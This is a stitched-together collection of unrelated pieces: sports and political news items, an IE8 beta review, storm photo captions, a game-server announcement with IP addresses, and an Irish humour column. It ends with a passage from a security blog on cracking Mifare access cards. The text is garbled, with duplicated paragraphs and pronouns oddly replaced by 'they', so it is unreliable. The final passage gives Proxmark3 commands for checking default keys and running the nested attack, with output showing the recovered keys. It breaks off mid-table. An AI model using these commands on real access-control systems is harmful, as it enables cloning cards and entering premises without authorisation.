And take away their security blanket -- the pick-and-roll lob for an Andre Drummond dunk , which had become the Pistons ' signature offensive play this season until the rookie center was injured last week -- and Bynum simply sets about establishing some of the same chemistry with the next 7-footer who comes along .
That happened to be Slava Kravtsov , the Ukraine rookie whose 13 minutes were a career-high , and who stuffed a Bynum lob to make it 76-70 before the Wizards scored the next six points to forge the game 's last tie .
`` Slava 's great , man . He 's been working hard every day . I 've been talking to them in the Ukrainian language , about the lob , trying to get them to be the new Andre Drummond while they ( Drummond ) is out , '' said Bynum , who had 20 points and eight assists , including 12 and five , respectively , in the fourth quarter .
Kravtsov had four points on two shots , both dunks . Their one rebound wo n't suffice long-term , but their post defense was `` instrumental , '' head coach Lawrence Frank said , and they helped ease the playing crunch facing Greg Monroe , who had their eighth consecutive double-double by halftime and finished with 16 points and 18 rebounds .
The Wizards , after making two free throws on their first possession of the fourth quarter , were 0 of 5 with four turnovers on their next nine possessions and went 5:41 before they scored again .
`` I thought their energy , their effort , I loved their confidence in there , their approach , '' Frank said . `` I felt really good with them in the game , just their post defense , their ability to hold their ground -- we saw it against Brook Lopez , against Brooklyn -- against those bigger , stronger guys . ''
Kyle Singler , who continued their solid play since shifting to small forward with 12 points and seven rebounds in a game-high 38 minutes , said the entire team was energized by the fourth-quarter defense , the guard mix , Charlie Villanueva 's long-range shooting -- particularly a key four-point play to give the Pistons their first lead of the second half , 71-70 -- and Kravtsov .
`` Guys get excited when we see Slava do things well because they practice great and for them to get a chance to play in the game is terrific , '' Singler said . `` He 's a big physical guy that can play minutes for us . It 's great to see and I can see them doing it for as long as Andre 's out . ''
The Pistons ( 21-33 ) beat the Wizards for the third time but it was a much more competitive game than the first two with point guard John Wall back from injury and center Nene no longer playing under a minutes restriction like they did in the December meetings .
The Wizards ( 15-36 ) did manage to turn Calderon into a shooter and they responded with a season-high 24 points and an uncharacteristic four turnovers and only three assists .
But they could n't stop either of the Pistons ' point guards when it mattered most , compounded by a decision not to play Emeka Okafor in the fourth quarter .
Wizards coach Randy Wittman acknowledged they probably should have used Okafor , who led their team with 20 points and nine rebounds , late in the game .
How that could have affected the Pistons ' perimeter playpen in the fourth quarter is a separate question .
`` We did not have an answer for Calderon or Bynum in the fourth quarter , '' Wittman said . `` They kind of did what they wanted to do . ''
-- Download the Detroit Pistons on MLive app for iPhone and Android
-- Follow David Mayo on Twitter
-- Like MLive 's Detroit Pistons Facebook page
The ladder for july is live ! More information can be found at the ladder page .
Today we are glad to announce the release of our first duels servers in EU and NA .
We released 4 servers on each continent as following :
Europe
Duels EU 1 - 149.202.87.140:27018 - connect
Duels EU 2 - 149.202.87.140:27021 - connect
Duels EU 3 - 149.202.87.140:27022 - connect
Duels EU 4 - 149.202.87.140:27023 - connect
North America
Duels NA 1 - 172.93.103.18:27021 - connect
Duels NA 2 - 172.93.103.18:27061 - connect
Duels NA 3 - 172.93.103.18:27022 - connect
Duels NA 4 - 172.93.103.18:27023 - connect
Due to high download times , we switched server to use workshop maps .
Five first players on 30/06 will win their own private server for 1 month !
Check your rank here
Even without the home team involved , the World Cup final between Germany and Argentina set a television viewership record in the United States , capping a tournament that exceeded expectations for interest on both ESPN and Univision .
An estimated 26.5 million people in the U.S. watched Germany 's extra-time win on Sunday afternoon , the Nielsen company said . The game had 17.3 million viewers on ABC and another 9.2 million on the Spanish-language Univision . In addition , just over 750,000 people were watching the game during a typical minute online through services provided by each network .
In Germany , a record 34.65 million people watched Sunday 's World Cup triumph -- the highest-ever viewing figures for German television .
The 2010 finale between Spain and the Netherlands , along with the U.S. team 's 2-2 draw against Portugal earlier in this year 's tournament , both had 24.7 million viewers .
The monthlong World Cup also was responsible for more than 3 billion interactions on Facebook and 672 million messages on Twitter , the social media companies said on Monday .
Given the growing interest in the tournament as it went along , the size of the audience for the final game was n't that big a surprise , said Scott Guglielmino , ESPN senior vice president of programming . The tournament as a whole exceeded expectations for ESPN and surprised Guglielmino in the way it permeated U.S. culture as no World Cup has before .
The average viewership for all 64 World Cup matches was up 39 percent over 2010 on ESPN and its sister station ABC and 34 percent on Univision , Nielsen said .
`` We all knew that everything was in place to be well-delivered to the audience and we needed a good performance by the teams , and that happened , '' said Juan Carlos Rodriguez , Univision sports president .
At least until some cautious games in the knockout round , play was more wide-open with increased scoring , which was appealing to viewers , the executives said . The event also had stories that transcended the games , with Uruguay 's Luis Suarez suspended for biting another player and host Brazil 's historic meltdown against Germany .
On ESPN , tournament games averaged 4.56 million television viewers , compared to the 1.04 million viewers for games in the 2002 World Cup that were in Korea and Japan .
World Cup organizer FIFA said more than a billion fans worldwide accessed information about the tournament through its digital platforms .
`` This has been the first truly mobile and social World Cup , '' said FIFA president Sepp Blatter .
Facebook said 88 million people made a total of 280 million posts or `` likes '' about the final game . The most social moment of the tournament on Facebook was right after Germany scored four goals in seven minutes during its semifinal victory against Brazil .
On Twitter , the Brazil-Germany match exceeded the final game for most tweets .
Both ESPN and Univision invested heavily to make the tournament an immersive experience , signing up former players for hours of discussion between matches .
Univision went high-tech , with virtual reality displays that pitted famed players from different eras against one another . The company also worked with an Israeli company to invest in technology that allowed its feed of games to appear on the network some five or six seconds before its English-speaking rival .
`` We 're the real home of soccer in America , regardless of language , '' Rodriguez said , predicting that ratings for the Copa America Centenario tournament in 2016 , which will match the best teams in North and South America , will exceed this year 's World Cup on their network .
The ratings performance was a little bittersweet for ESPN and Univision , however . Both networks were outbid for the rights to broadcast the 2018 World Cup in Russia .
So there was a little gamesmanship involved . Guglielmino said the intention was to create a `` high bar '' for Fox when it broadcasts the 2018 tournament . Given that the games in Russia will take place at inconvenient times in the U.S. market , Fox may be hard-pressed to beat these ratings .
`` At the end of the day , a lot of us are just as competitive as some of the people we cover , '' Guglielmino said .
Information from The Associated Press was used in this report .
Image copyright AFP/Getty Image caption Theresa May campaigning in Abingdon , Oxfordshire
Theresa May is promising what they say would be the biggest expansion of workers ' rights by any Conservative government , if the party retains power .
Its manifesto will promise to keep all workers ' rights currently guaranteed by EU law , put worker representation on company boards and protect pensions .
There would also be a statutory right to a year 's unpaid leave to care for a relative , under the election plans .
But Labour said Mrs May was `` taking working people for fools '' .
And the GMB union said its members would `` believe it when they see it '' .
In what BBC political correspondent Ben Wright says is an `` unabashed pitch for Labour voters '' , Mrs May promised a `` new deal for workers '' , with a string of proposals .
The statutory right to leave to care for a family member is similar to provision that already exists in countries such as the Republic of Ireland .
There would also be statutory leave for parents whose child has died .
Other measures would include new protections for people in the `` gig economy '' , a statutory right to training , measures to protect workers ' pensions in the wake of the BHS scandal , and a guarantee that European Union rights will be protected in the Brexit process .
The national living wage for workers aged 25 and over , currently £7.50 an hour , would rise in line with average earnings until 2022 .
Image caption Theresa May visited Tech Pixies to hear about 'returnships '
The Conservatives would also insist listed companies had representation for workers on their boards - whether on advisory panels , as a non-executive director or through a directly appointed worker representative - although firms would not be forced to have actual employees in the boardroom .
Work and pensions minister Damian Green denied this was a watering down of an earlier pledge by Theresa May , saying each of the three options would `` get the voices of workers in the boardroom '' .
They also told the Today programme allowing workers to take a year off to care for a relative was about achieving a `` happy and contented workforce '' .
Media playback is unsupported on your device Media caption The Prime Minister took questions on mental health and housing from members of the public
`` All evidence shows that if people feel happy at work then they are more productive , '' they said .
Mrs May , visiting Oxfordshire , said : `` By working with business , reducing taxes and dealing with the deficit , we have delivered steady improvements to the economic prospects of working people .
`` Now is the time to lock in that economic growth and ensure the proceeds are spread to everyone in our country . ''
They said they also wanted to `` encourage and support returnships '' , to help women get the skills and experience needed when they want to return to work after looking children .
Answering questions from the public later in an ITV Facebook Live , they acknowledged it would be `` difficult '' for many people to take a year off work to care for a loved one if they were unpaid but said this and other measures amounted to the biggest single extension of workplace rights ever offered by the Conservatives .
However , when pressed on whether they could guarantee free bus passes for pensioners and disabled people in the future , they said people would have to wait until the party 's manifesto later this week to find out .
Labour , which has repeatedly warned of the threat to workers ' rights posed by Brexit , dismissed the announcement .
It argued the Tories had overseen an `` era of non-compliance of employment law '' , an `` explosion in low pay and stagnating wages '' and a `` massive expansion in bogus self-employment '' .
'End pay squeeze '
It also said a pledge from Mrs May to put workers on company boards had been `` watered down '' .
`` Theresa May and their Tory government have failed to stand up for workers , with hundreds of thousands not being paid the money owed to them , thousands unable to get their case against their employer heard , and hundreds of complaints of employment agency malpractice going un-investigated , '' said campaign chairperson Andrew Gwynne .
Vince Cable , the Liberal Democrats ' former business secretary , said : `` The Conservatives tried to ban workers from striking and were blocked by the Liberal Democrats in government .
`` It 's clear they are n't the party of workers ' rights and that you ca n't trust them to care about you and your family . ''
GMB general secretary Tim Roache said achieving the greatest expansion of workers ' rights by a Conservative government `` would n't be that hard to achieve given recent history '' .
They called for an end to the squeeze on public sector pay and to the `` wide scale abuse '' of agency contracts .
Green Party co-leader Jonathan Bartley said : `` It is almost laughable that the Tories are trying to pitch themselves as a party that stands up for workers ' rights . The Conservative government tried to bring in anti-strike laws , oversaw a huge increase in zero hours contracts and attempted to shut down trade unions . ''
For those who may have been unable to sleep , tossing and turning , feverishly awaiting the second beta of Internet Explorer 8 — you can relax now . It 's here .
Or , depending on how well you tolerate buggy , unfinished software , your anxiety may be just beginning .
I 've been testing an early version for a couple a week . I 'm tied up working in the Blogwatch blog as part of our Democratic National Convention coverage , so I ca n't do a full review of it at the moment . But here are some initial thoughts :
• I have worked with two pre-Beta 2 versions , and both were fairly buggy and crashed often . The second had a bug that made Windows Live Writer , my blogging editor of choice , fairly unusable . I have not yet tried the formal Beta 2 release , but this is indeed a work in progress . The usual caveats apply — I would not install it on a machine on which you rely .
• IE8 is the most standards-compliant browser Microsoft has yet released . However , past versions of IE have not been as compliant . To get around this , many developers tweak their Web sites in non-standard ways because of IE 's dominant market share . Their sites sense what browser is being used and display code accordingly . I found a lot of Web sites crashed IE as a result . However , there 's a very handy button next to the address field that will automatically switch to an IE7 view of a site . If you install IE8 , I suspect this feature will be one you will use often . It certainly became my best friend .
• Microsoft has attempted to recreate Firefox 3 's `` awesome bar '' in IE8 , and goes it one better . It searches through your history , Favorites and any RSS feeds you 've saved in IE . You can type the name of a site instead of the URL and get a quick list that is sorted based on the results type . The sorting makes it helpful to quickly find what you want if you have a long list of results .
• A feature called Accelerators automates common tasks , such as bringing up a map from an address or conduct a search . The default Accelerators use Microsoft services , but you can add others . For example , you can map through Yahoo or Google Maps if you like .
• IE8 feels slightly faster than IE7 , but nowhere near as fast as Firefox 3 . I ran no benchmarks , and this is beta code . But Microsoft clearly is working on making IE zippier .
There are more important features , and you can get more details here . I 'll get some more details up as soon as I can . But here 's my quick verdict : It has some intriguing features and I generally like it , but unless the final Beta 2 has dramatically improved stability , most users will want to wait for a release candidate or the finished version to try it out .
There are versions for Windows XP , Vista and Server 2003 . There are 64-bit versions for Vista and Server 2003 as well .
Update | 8.27.2008 : I 've finally gotten time to play with the formal Beta 2 version , and it appears initially to be much more stable than the earlier builds . In addition , the issue I had with Windows Live Writer is gone .
Another note : The pre-B2 builds I tried did n't like Google Toolbar , and blocked it as incompatible . The real Beta 2 gets along just fine with Google Toolbar .
I 'll have a more detailed review up sometime today or tomorrow . Meanwhile , for a good overview , check out my friend Ed Bott 's review at ZDNet .
The scene near Glasgow 's derelict Great Eastern Hotel which had part of its roof blown off as gale force winds and heavy rain hit parts of Scotland The gale-force winds brought down trees across the country . In this case , in Dundee , a house roof was damaged . ( Picture by Alan Richardson ) Five lorries overturned as winds reached up to 80mph . A lorry lies on its side , blown over by the wind on the M9 near Stirling The damage at Bridge of Allan primary school in Stirling after high winds overnight saw the school roof blown off A car near the Seabraes student flats in Dundee where a section of the roof blew off landing on cars in the car park . The building was evacuated . ( Picture by Alan Richardson ) Building work at Partick train station in Glasgow 's west end was hit by the winds . The weather closed roads , bridges and hit train services Nicola Cameron from Burnside near Glasgow took this picture of a tree on a neighbour 's car . Ms Cameron said they could hear the sound of a number of chainsaws in the area John Neil , Ayrshire , said : `` The tree destroyed a lot of fencing . There is notable damage to roofs in the area as well . '' A tree blown over in the square in central Stirling . Work is ongoing to clear trees from roads across the country . ( Picture by John Summers ) Paul Hughes , Carmunnock , said : `` My back garden . Two of us were holding down the trampoline at 2am this morning while we tried to tether it to the fence . '' Pete Wright was awoken at 0500 GMT by a tree resting precariously on wheelie bin just above their car . Back 1 2 3 4 5 6 7 8 9 10 11 Next
E-mail this to a friend Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon What are these ?
For Tanya Plibersek , the deputy leader of Australia 's Labor Party , legalising same-sex marriage is a simple matter of righting an injustice .
`` I think this is an issue of legal discrimination against one group in our community , '' they said on ABC 's Q & A program Monday night . `` Do we have a conscience vote about whether we allow racism in our community ? Do we have a conscience vote on whether we allow sexism or ageism ? We do n't . ''
See also : A global offering of love to 31 Australian couples whose marriages were voided
While Labor 's platform has supported same-sex marriage since 2011 , its members are currently permitted a conscience vote when a marriage equality bill comes before parliament . A conscience vote — a rare occurrence in Australia — allows members of parliament ( MPs ) to vote as their own moral , religious or political beliefs dictate on topics such as abortion and euthanasia , and not along party lines .
Plibersek wants to change that . At the party 's national conference in July , they intend to push for Labor MPs to be bound to vote for same-sex marriage , they told Fairfax Media .
`` Conscience votes in the Labor Party are reserved for issues of life or death , '' they said during Q & A . As same-sex marriage does n't fall into that category , according to Plibersek , a conscience vote is unnecessary and stands in the way of freedom from discrimination for homosexual people in Australia .
Prime Minister Tony Abbott , who is the leader of the Liberal Party and a same-sex marriage opponent , announced before the 2013 election their party room would debate allowing Liberal MPs a conscience vote on gay marriage , but the matter is yet to be raised .
Australian Marriage Equality National Director Rodney Croome said in a statement they welcomed Plibersek 's position . `` If successful , it will help break the current deadlock over marriage equality , '' they said . `` A Labor binding vote and a [ Liberal ] free vote would be a recalibration to the normal situation and allow Australia to finally achieve marriage equality . ''
Croome told Mashable Australia a binding vote for Labor would increase the likelihood of marriage equality being passed . `` In the current parliament , I think there would be enough support in the Liberal Party to make the passage of marriage equality quite likely , '' they said .
In the wake of Plibersek 's announcement , however , some believe the prospect of a Liberal conscience vote is dead .
Dean Smith , the Liberal Party 's first openly gay senator and a supporter of same-sex marriage , told Fairfax Media if Labor adopted a binding vote on gay marriage , the Liberal Party would not go forward with a conscience vote . `` Conservatives who oppose same-sex marriage and a conscience vote will be sitting pretty , '' they said . `` There has been a slow and cautious approach to achieving a conscience vote and they have wrecked that . ''
For some same-sex marriage supporters , however , the question is already a tad passé .
A superb display from Croatia put them in a commanding position going into Tuesday 's second leg .
Guus Hiddink played a 4-3-3 system , with Giray Kacar brought in at the back . Kazim Kazim was injured , so Burak Yilmaz continued upfront , with support from Arda Turan and Hamit Altintop .
Slaven Bilic used 4-4-2 , with Mario Mandzukic and Ivica Olic upfront . Luka Modric was in the middle with Ivan Rakitic tucked in on the left , whilst Vedran Corluka was on the left and Domagoj Vida right .
Croatia raced into a second minute lead and always looked in control , wrapping up the game ( and probably the tie ) with the third goal through Corluka on 50 minutes .
Formations match-up
This was a contrast of systems , a classic battle between a 4-3-3 and a 4-4-2 . Whilst formation does n't completely dictate the style of football being played , it 's clear that different formations are more suited to different approaches ( or vice-versa ) . The difference between a 4-4-2 and a 4-5-1 / 4-3-3 is summed up nicely by Sir Alex Ferguson .
“ The idea behind the 4-5-1 is that you can control the midfield and keep possession of the ball – that 's always your aim when you use that formation , ” they say . “ I believe the team that has possession of the ball has more opportunities to win the match . As for the 4-4-2 , there is more emphasis in that formation placed on playing the ball forward and usually you use the two traditional wingers . ”
This game was the perfect case study – the 4-3-3 dominated possession ( 70 % compared to 30 % ) but the 4-4-2 was more direct and created more goalscoring chances ( 13 shots , 9 on target , 3 goals compared to 2 , 0 , 0 ) according to UEFA .
Croatia tactics
So , how did Croatia do it ? For the first five minutes , they pressed heavily at the top of the pitch , with both Olic and Mandzukic working tirelessly to close down the centre-backs and the deepest Turkey midfielder , Selcuk Inan . Mandzukic would often drop deep onto Inan to prevent them getting the ball , and then when Croatia won the ball , he 'd sprint forward to join Olic whilst Inan would be attracted to the ball .
The early goal was crucial , because it meant Turkey had to attack and leave spaces at the back for Croatia breaks . Those attacks from the away side were very quick , generally coming down the flanks – Croatia would leave one player in front of the defence , usually Tomislav Dujmovic , but the rest would break forward immediately . Rakitic and Darijo Srna were the key players , able to pick up the ball in space and run at the Turkey full-backs – both of whom had very poor games .
Two banks of four
Croatia were on top for the first ten minutes , but then Turkey started to make the most of their numerical advantage in the middle , and the passing from the away side was poor . Olic and Mandzukic stopped pressing and instead dropped alongside Inan , making it difficult for Turkey to play out from the back to Inan , and equally difficult for Inan to play the ball forward when they did get possession .
Defensively , Croatia did nothing special , defending deep with two banks of four . Turkey had the right idea with the ball , being patient and logical with their passing – trying to drag the Croatian wide midfielders inside to deal with the 3 v 2 , then getting their full-backs forward on the overlap .
Turkey lacked penetration , though , with a midfield offering little creativity . Croatia often looked slightly open in that they left a lot of space between the defence and midfield – but this was partly as a result of Turkey having no-one coming into that zone . Altintop , perhaps , could have drifted inside to try and open things up , but more often than not it was Yilmaz dropping deep to offer a threat in that area , which just contributed to Turkey playing infront of Croatia , rather than going through them .
Srna attacks
Srna started the game very poorly , but went onto become a key player down the right , . They were the best Croatian player at turning defence into attack quickly with direct running , and was also very clever at winning free-kicks , which they delivered with great accuracy himself . They provided the cross for Mandzukic 's second before half-time , then won and took the free-kick for Corluka 's header at the start second half .
Bilic deserves great credit for playing Srna there and having faith in the inexperienced Vida behind them – another manager may have dropped Srna to their favoured position of right-back , but then they would n't have been such a force going forward .
Substitions
The game changed little as the game went on . Hiddink brought on winger Gokhan Tore to play on the right for the second half , managing to get rid of the terrible Gokhan Gonul , whose poor defending against Corluka for the first goal was arguably the key incident of the game . Altintop dropped to a right-sided central midfield position , with Sabri Sarioglu going back to right back .
Later , they brought on Mehmet Topal for Inan to try to circulate the ball quicker from midfield , and Umut Bulut for Yilmaz for a more direct option upfront , but Turkey barely created a chance .
Bilic introduced Danijel Pranjic for Rakitic to help shield the defence , then replaced the two strikers when they tired – but all substitutions came after 80 minutes – they wanted to change as little as possible .
Conclusion
Bilic knew how well their tactics had worked . “ We deserved to win by even more goals , ” they said . “ It was fantastic . I want to congratulate all my players – they played the whole match without making any mistakes . It was really amazing. ” “ Turkey did not create a single chance , which is quite remarkable since they had the home advantage , ” added Olic .
Hiddink took the blame for the defeat . “ I am responsible for the results . The players have to execute things properly , but I take full responsibility…if you come out in the first minute , badly-organised and outplayed very easily , then it 's already a difficult game . We gave them the favour of two counter attacks , which was the killer . ”
Bilic showed how to play away from home with a 4-4-2 – they ordered their players to sit deep , then break quickly down the flanks through the wide players , and also paid attention to Turkey 's spare midfielder , Inan , and dropped one or both strikers close to him . The work rate of the front two , the directness of Srna and the discipline of Dujmovic were also vital .
Turkey were dreadful , though – so much possession and hardly a sniff of a chance . The lack of creativity and thrust from the centre of midfield was amazing , and Tuesday 's return game will surely be Hiddink 's last as a manager .
Related articles on Zonal Marking :
Luke is available for hire , or can be contacted without promising them money , at luke ( at ) lukemckinney ( dot ) org
COMEDY ‎ > ‎ 5 Reasons You Do n't Want To Be Irish This St Patrick 's The same thing happens to me every St Patrick 's day . Some huge North American unused to fine living/being drunk so early will decide that blood-alcohol is nearly as good as blood-ties and stampede over , telling me `` My great-grandmother was Irish ! `` , to which I reply `` Great , if they show up I 'll buy them a pint . '' Further claims of Gaelic heritage , like the claimants , only get shakier as the day wears on .
I 'll get the fact Patrick was born in Britain and educated in France out of the way in this caption
`` My aunt married an Irishman ! We bought some Waterford crystal ! I ate a potato that had n't been turned into fries yet once ! '' The worst I ever saw was an American with a green rugby shirt , fake red-haired wig and an Irish flag worn as a cape staggering out of a bar at 1 pm . It was a worse attempt at claiming a second nationality than a US passport application from Osama Bin Laden . ( I do n't know what it is about the US educational system , but most other countries understand that the flag is a symbol , not a holy object to be venerated in itself . `` Do n't worship anything that can be made to clean up stains '' is a fairly basic rule . ) `` The worst I ever saw was an American with a green rugby shirt , fake red-haired wig and an Irish flag worn as a cape staggering out of a bar at 1 pm . It was a worse attempt at claiming a second nationality than a US passport application from Osama Bin Laden . ( I do n't know what it is about the US educational system , but most other countries understand that the flag is a symbol , not a holy object to be venerated in itself . `` Do n't worship anything that can be made to clean up stains '' is a fairly basic rule . )
If you see someone wearing this , punch them . I guarantee they 've already done something to deserve it today .
Which is why I 'm grateful for five reasons no-one will want to be Irish this year . Which is why I 'm grateful for five reasons no-one will want to be Irish this year .
1 . Our Economic Crisis Is Stupider Than Yours
We now owe one hundred billion euros and have a 190 % household debt to disposable income ratio , the highest in the entire first world and it might well get us demoted from that league . Worst of all , an elite group of bankers did n't steal all the money . Americans might feel bad about bankers getting billions for driving the entire country off a cliff , but it 's even worse when the drivers are still in the front screaming OH GOD HOW DID THIS HAPPEN ? At least when the CEOs escape with fortunes you can think `` Well , we employed them because we thought they were good at making money , and we were right . We just did n't think that plan through . '' When the same CEOs are bankruptly blubbing on national news about how it 's all gone wrong you can finally answer the question `` Who is more foolish , the fool or the fool who follows the fool ? '' with `` Definitely the latter , aka me . ''
Something red has n't dropped so fatally since Darth Maul fell down that vent shaft
It 's the difference between being killed for your wallet and being killed because some idiot left the parking brake off . Several major property investors committed suicide after the crash , really putting the icing on that `` Who can be the most totally useless '' cake they 'd apparently been baking for the entire country .
It 's the difference between being killed for your wallet and being killed because some idiot left the parking brake off . Several major property investors committed suicide after the crash , really putting the icing on that `` '' cake they 'd apparently been baking for the entire country . 2 . Our Housing Crisis Is Stupider Than Yours
Nothing was improved with all the pretend money . The Irish bubble was in houses and real estate , so in the words of Michael Lewis we spent our burrowed money buying our own country from each other . We did n't build a single worthwhile thing , because we all already had houses - we spent the money digging a vast property pit under ourselves and waited , Wil E. Coyote like , for economics and gravity to notice .
Someday , son , all this will be yours . Actually do you mind taking it now ? There 's always a crime surge after an economic collapse , but Ireland has managed to skip most of the intermediary violence by putting most of the population in prison . The unique bit is how they 're paying for their own cells . Those who dared to want somewhere to live during the boom are now locked into vastly inflated mortgages , and because Irish mortgages do n't have a `` just keep it '' option ( many countries consider giving the bank both the money you paid and the thing you were paying enough to pay them off ) , thousands are serving thirty year sentences for wanting a roof . Except real prisons get in trouble if they turn off the heat , while these new self-paid jails often ca n't afford it .
3 . Our Politicians Are Stupider Than Yours
The stereotype of the Irish as drunken incompetents is prejudicial , mean-spirited , and exactly what anyone listening to last year 's news would believe . Last year then-Taoiseach Brian Cowan
There 's always a crime surge after an economic collapse , but Ireland has managed to skip most of the intermediary violence by putting most of the population in prison . The unique bit is how they 're paying for their own cells . Those who dared to want somewhere to live during the boom are now locked into vastly inflated mortgages , and because Irish mortgages do n't have a `` just keep it '' option ( many countries consider giving the bank both the money you paid and the thing you were paying enough to pay them off ) , thousands are serving thirty year sentences for wanting a roof . Except real prisons get in trouble if they turn off the heat , while these new self-paid jails often ca n't afford it.The stereotype of the Irish as drunken incompetents is prejudicial , mean-spirited , and exactly what anyone listening to last year 's news would believe . Last year then-Taoiseach Brian Cowan appeared on breakfast radio sounding pissed-er than a six-pack of Tennants in an alcoholic 's dialysis machine . They were addressing the nation , and I 've sounded soberer while vomiting into a toilet . The incompetence was provided by our financial regulator , Patrick Neary , who appeared on Prime Time to reassure the nation with all the calm authority of a pilot searching for a parachute but without that kind of forward thinking . This man was meant to be controlling banks and businesses for the good of the nation , and they responded to an interviewer 's questions like a diarrhetic ostrich . You really should watch that video : over the course of the interview Patrick appears to go stone deaf and the host ends up about one question from Hulking out at him . Most countries divide their politics into two even blocks pulling in opposite directions to make sure nothing gets done , and our politics makes that look smart . Instead of dividing the government into left and right , or liberal and conservative , or not-Qadaffi and Qadaffi ( do n't try that one ) , our parties are divided by Santa 's Elves . Well , effectively Santa 's Elves , on the grounds that anyone who believes it 's still a real reason to make decisions should n't be allowed to . You can read about it in this great blog , but the upshot is we have two near identical parties and for the first time we 're so pissed we 're not just voting out the one who happened to be holding the hot potato that year . We want actual new people to the point where we elected Ming the Merciless , and we 're only sorry we could n't find the real one to send down to the Dáil .
4 . We Are Stupider Than You
Another stereotype : we 're a bunch of religiously backward bog-farmers . While I could offer up the chunks of Irish law relating to women 's rights , or rather not doing so , I and comedy itself have been outdone by real-life stupidity . At least five people burned out their own eyeballs staring at the sun in the hope of seeing the Virgin Mary . Yes , the real sun . The bloody great ball of fire in the sky even your own face tries to turn away from if you look at it . Unlike 10,000 people who went to Knock , preferred Irish destination for people who either believe in magic or that Holy God 's glorious omnipotence works better in certain places like mobile phone reception .
5 . Even We Do n't Want To Be Irish Right Now
The standard Irish crisis response has always been to leave and that has not changed . I 'm proud to say that I left before it was cool , because you ca n't be proud of saying `` I left before it was an utter financial nightmare of Atlantis Plumbing Incorporated proportions . '' I 'd always planned on returning and even my own mother , whose sole fear is that I 'll one day disappear to China or something , has told me `` For God 's sake do n't come back now . '' The emigration rate up to about 140 a day - one person left while you were reading this .
Why would you want to be from here ? Even we do n't . And we are !
Introduction
Or rather miniature guns , that pack a powerful punch… Our previous posting on Access Control Part 2 : Mifare Attacks , we demonstrated a weakness in some Mifare implementations . Our previous attack relied on the use of a single default key , and using the nested attack to eventually recover all keys for the card . Additionally , we used a rather cheap and affordable ACR-122U reader that costs approximately $ 40 ( USD ) , and the attack process took approximately 20-30 minutes .
Below we will repeat the attack with some more advanced piece of kit – the Proxmark3 ; the kit costs approximately $ 400 ( USD ) including the antennas and necessary cables ( you have to pay a little extra for a protective case ) .
As the Proxmark3 is specifically built for RFID hacking/research ; it contains an ARM Processor and Field Programmable Gate Array ( FPGA ) , the attacks are a lot faster as calculations can be performed in hardware as opposed to software . This dramatically makes attacks faster , and opens up other attack avenues to successfully break older Mifare implementations – specifically cards without default keys .
Checking For Default Keys
Rather than describe the process in-depth , below is the screen dump of the command hf mf chk * 1 ? t which will check all sectors for a predefined list of default keys :
proxmark3 > hf mf chk * 1 ? t No key specified , try default keys chk default key [ 0 ] ffffffffffff chk default key [ 1 ] 000000000000 chk default key [ 2 ] a0a1a2a3a4a5 chk default key [ 3 ] b0b1b2b3b4b5 chk default key [ 4 ] aabbccddeeff chk default key [ 5 ] 4d3a99c351dd chk default key [ 6 ] 1a982c7e459a chk default key [ 7 ] d3f7d3f7d3f7 chk default key [ 8 ] 714c5c886e97 chk default key [ 9 ] 587ee5f9350f chk default key [ 10 ] a0478cc39091 chk default key [ 11 ] 533cb6c723f6 chk default key [ 12 ] 8fd0a4f256e9 -- SectorsCnt:0 block no:0x03 key type : A key count:13 Found valid key : [ a0a1a2a3a4a5 ] -- SectorsCnt:1 block no:0x07 key type : A key count:13 -- SectorsCnt:2 block no:0x0b key type : A key count:13 -- SectorsCnt:3 block no:0x0f key type : A key count:13 Found valid key : [ a0a1a2a3a4a5 ] ... abbreviated ...
Sectors 0 & 3 both contain a known default key !
The Nested Attack
Now with at least one default key we can perform the Nested Attack :
proxmark3 > hf mf nested 1 0 A a0a1a2a3a4a5 t -- block no:00 key type:00 key : a0 a1 a2 a3 a4 a5 etrans:1 Block shift=0 Testing known keys . Sector count=16 nested ... .. uid:3b0e943f len=1 trgbl=0 trgkey=1 .uid:3b0e943f len=1 trgbl=0 trgkey=1 .uid:3b0e943f len=1 trgbl=0 trgkey=1 .uid:3b0e943f len=3 trgbl=0 trgkey=1 .uid:3b0e943f len=2 trgbl=0 trgkey=1 . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- Total keys count:679553 Found valid key:6d59ee19b1c9 .. uid:3b0e943f len=1 trgbl=4 trgkey=0 .uid:3b0e943f len=2 trgbl=4 trgkey=0 .uid:3b0e943f len=2 trgbl=4 trgkey=0 .uid:3b0e943f len=2 trgbl=4 trgkey=0 .uid:3b0e943f len=2 trgbl=4 trgkey=0 . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- Total keys count:756531 Found valid key:1494e81663d7 .. uid:3b0e943f len=2 trgbl=4 trgkey=1 .uid:3b0e943f len=2 trgbl=4 trgkey=1 .uid:3b0e943f len=2 trgbl=4 trgkey=1 .uid:3b0e943f len=3 trgbl=4 trgkey=1 .uid:3b0e943f len=3 trgbl=4 trgkey=1 . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- Total keys count:850267 Found valid key:6d59ee19b1c9 ... abbreviated ... Total keys count:1093909 Found valid key:6d59ee19b1c9 Iterations count : 30 | -- -| -- -- -- -- -- -- -- -- | -- -| -- -- -- -- -- -- -- -- | -- -| |sec|key A |res|key B |res| | -- -| -- -- -- -- -- -- -- -- | -- -| -- -- -- -- -- -- -- -- | -- -| |000| a0a1a2a3a4a5 | 1 | 6d59ee19b1c9 | 1 | |001| 1494e81663d7 | 1 | 6d59ee19b1c9 | 1 | |002| 1494e81663d7 | 1 | 6d59ee19b1c9 | 1 | |003| a0a1a2a3a4a5 | 1 | 6d59ee19b1c9 | 1 | |004| 1494e81663d7 | 1 | a24c49684d8e | 1 | |005| 1494e81663d7 | 1 | 6d59ee19b1c9 | 1 | |006| 1494e81663d7 | 1 | 6d59ee19b1c9 | 1 | |007| 1494e81663d7 | 1 | 6d59ee19b1c9 | 1 | |008| 1494e81663d7 | 1 | 6d59ee19b1c9 | 1 | |009| 1494e81663d7 | 1 | 6d59ee19b1c9 | 1 | |010| 1494e81663d7 | 1 | 6d59ee19b1c9 | 1 | |011| 1494e81663d7 | 1 | 6d59ee19b1c9 | 1 | |012| 1494e81663d7 | 1 | 6d59ee19b1c9 | 1 | |013| 1494e81663d7 | 1 | 6d59ee19b1c9 | 1 | |014| 1494e81663d7 | 1 | 6d59ee19b1c9 | 1 | |015| 1494e81663d7 | 1 | 6d59ee19b1c9 | 1 | | -- 